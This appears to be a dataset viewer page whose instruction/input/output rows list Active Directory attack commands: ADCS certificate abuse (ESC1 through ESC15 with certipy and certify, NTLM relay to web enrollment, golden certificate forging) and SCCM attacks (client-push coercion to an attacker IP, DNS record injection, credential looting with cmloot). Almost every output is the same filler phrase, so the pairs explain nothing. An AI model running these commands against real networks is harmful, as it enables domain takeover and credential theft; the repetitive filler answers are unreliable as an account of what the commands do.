instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Enumeration | certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip> | Note or procedural step under 'Enumeration'. |
Enumeration | ldeep ldap -u <user> -p <password> -d <domain> -s <dc_ip> templates | Note or procedural step under 'Enumeration'. |
Enumeration | Get PKI objects information | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe pkiobjects | Note or procedural step under 'Enumeration'. |
Enumeration | Display CA information | Note or procedural step under 'Enumeration'. |
Enumeration | certutil -TCAInfo | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe cas | Note or procedural step under 'Enumeration'. |
Web Enrollment Is Up | ESC8 | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt | Tool or command referenced under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file> | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | certipy relay -target http://<ip_ca> | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | certipy auth -pfx <certificate> -dc-ip <dc_ip> | Note or procedural step under 'Web Enrollment Is Up'. |
Misconfigured Certificate Template | ESC1 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -upn <target_user>@<domain> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" [/altname:"Admin"] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC2 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC3 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC3 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request request /ca:<server>\<ca-name> /template:<template> /onbehalfof:<domain>\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC13 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC15 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> -upn <target_user>@<domain> --application-policies 'Client Authentication' #[PR 228] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> --application-policies 'Certificate Request Agent' # [PR 228] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -on-behalf-of '<domain>\<user>' -pfx <cert> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured ACL | ESC4 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | write privilege over a certificate template | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -save-old -debug | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC1 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | restore template | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC7 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Manage CA | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -ca <ca_name> -add-officer '<user>' -username <user>@<domain> -password <password> -dc-ip <dc_ip> -target-ip <target_ip> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC7 Manage certificate | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Manage certificate | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | error, but save private key and get issue request | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Issue request | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retreive <request_id> #Pass the certificate | Note or procedural step under 'Misconfigured ACL'. |
Vulnerable PKI Object access control | ESC5 | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | Vulnerable acl on PKI | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | ACL | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | Golden certificate | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | certipy ca -backup -u <user>@<domain> -hashes <hash_nt> -ca <ca_name> -debug -target <ca_ip> | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | certipy forge -ca-pfx '<adcs>.pfx' -upn administrator@<domain> # Pass the Certificate | Note or procedural step under 'Vulnerable PKI Object access control'. |
Misconfigured Certificate Authority | ESC6 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | Abuse ATTRIBUTESUBJECTALTNAME2 flag set on CA you can choose any certificate template that permits client authentication | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ESC1 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ESC11 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ntlmrelayx.py -t rpc://<ca_ip> -smb2support -rpc-mode ICPR -icpr-ca-name <ca_name> | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt | Tool or command referenced under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file> | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | certipy relay -target rpc://<ip_ca> -ca '<ca_name>' | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | certipy auth -pfx <certificate> -dc-ip <dc_ip> #Pass the Ticket #DCSYNC #Domain Admin | Note or procedural step under 'Misconfigured Certificate Authority'. |
Abuse Certificate Mapping | ESC9/ESC10 (implicit) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB> | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC9/ESC10 (Case 1) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC9 | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template> #reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 (case 1) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth> #reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 (Case 2) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>' | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 Case1 | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain> | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | [Kerberos Mapping] ESC9/ESC10(Case 1) #Pass The Certificate | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | [Schannel Mapping] ESC9/ESC10 (Case 2) #Pass The Certificate | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC14 (explicit) | Note or procedural step under 'Abuse Certificate Mapping'. |
recon | sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug | Note or procedural step under 'recon'. |
recon | sccmhunter.py show -all | Note or procedural step under 'recon'. |
recon | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm | Note or procedural step under 'recon'. |
recon | nxc smb <sccm_server> -u <user> -p <password> -d <domain> --shares | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Creds-1 No credentials | Extract from pxe See no creds | Note or procedural step under 'Creds-1 No credentials'. |
Creds-1 No credentials > PXE | NAA credentials | Note or procedural step under 'Creds-1 No credentials > PXE'. |
Creds-1 No credentials > PXE | User + Pass | Note or procedural step under 'Creds-1 No credentials > PXE'. |
Elevate-1:Relay on site systems Simple user | coerce sccm site server | Note or procedural step under 'Elevate-1:Relay on site systems Simple user'. |
Elevate-1:Relay on site systems Simple user | ntlmrelayx.py -tf <site_systems> -smb2support #Admin on Site system | Note or procedural step under 'Elevate-1:Relay on site systems Simple user'. |
Elevate-2:Force client push Simple user | ntlmrelayx.py -t <sccm_server> -smb2support -socks # listen connection | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | SharpSCCM.exe invoke client-push -mp <sccm_server>.<domain> -sc <site_code> -t <attacker_ip> # Launch client push install | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | proxychains smbexec.py -no-pass <domain>/<socks_user>@<sccm_server> | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | cleanup #Admin | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-3:Automatic client push Simple user | Create DNS A record for non existing computer x | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | dnstool.py -u '<domain>\<user>' -p <pass> -r <newcomputer>.<domain> -a add -t A -d <attacker_ip> <dc_ip> | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | Enroll new computer x in AD then remove host SPN from the machine account | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | setspn -D host/<newcomputer> <newcomputer> setspn -D host/<newcomputer>.<domain> <newcomputer> | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | wait 5m for client push | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | ntlmrelayx.py -tf <no_signing_target> -smb2support -socks | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | cleanup #Relay ntlm | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
CRED-6 Loot creds | SCCM SMB service (445/TCP) on a DP | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | cmloot.py <domain>/<user>:<password>@<sccm_dp> -cmlootinventory sccmfiles.txt | Note or procedural step under 'CRED-6 Loot creds'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.